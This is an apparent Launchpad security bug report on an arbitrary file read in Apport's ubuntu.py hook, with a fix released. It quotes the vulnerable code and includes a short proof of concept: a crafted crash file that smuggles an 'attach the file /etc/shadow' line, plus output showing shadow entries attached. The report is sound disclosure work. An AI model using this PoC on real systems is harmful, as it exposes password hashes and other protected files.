Arbitrary file read in general hook (ubuntu.py)
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Apport |
Fix Released
|
Critical
|
Unassigned | ||
apport (Ubuntu) |
Fix Released
|
Critical
|
Unassigned |
Bug Description
While reviewing Apport's general hooks it was found that the hook `apport/
if report['Package'] in ['emacs22', 'emacs23', 'emacs-snapshot', 'xemacs21']:
# emacs add-on packages trigger byte compilation, which might fail
# we are very interested in reading the compilation log to determine
# where to reassign this report to
regex = r'^!! Byte-compilation for x?emacs\S+ failed!'
if attachment in report and re.search(regex, log_file, re.MULTILINE):
for line in log_file.
m = re.search(r'^!! and attach the file (\S+)', line) # [0]
if m:
After using a regular expression to extract the file to attach [0], the extracted file subsequently gets attached to the report file [1].
With automatic crash reporting enabled the following PoC (tested on 20.04/21.04 Desktop) includes the file `/etc/shadow` in the respective report file:
cat << EOF > /var/crash/
ProblemType: Package
ExecutablePath: /poc
Package: emacs22
DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
!! and attach the file /etc/shadow
EOF
grep -A5 DpkgTerminal /var/crash/
DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
!! and attach the file /etc/shadow
.etc.shadow:
root:!
daemon:
bin:*:
Best regards!
Related branches
information type: | Private Security → Public Security |
Changed in apport: | |
status: | New → Fix Released |
importance: | Undecided → Critical |
milestone: | none → 2.21.0 |
Changed in apport (Ubuntu): | |
importance: | Undecided → Critical |
I am unable to reproduce this issue on an up to date Ubuntu 20.04 desktop install - when apport sees the crash file it runs but is not able to access /etc/shadow so this does not get attached - am I missing something? Can you please provide instructions for reproducing this on a fresh Ubuntu 20.04 install?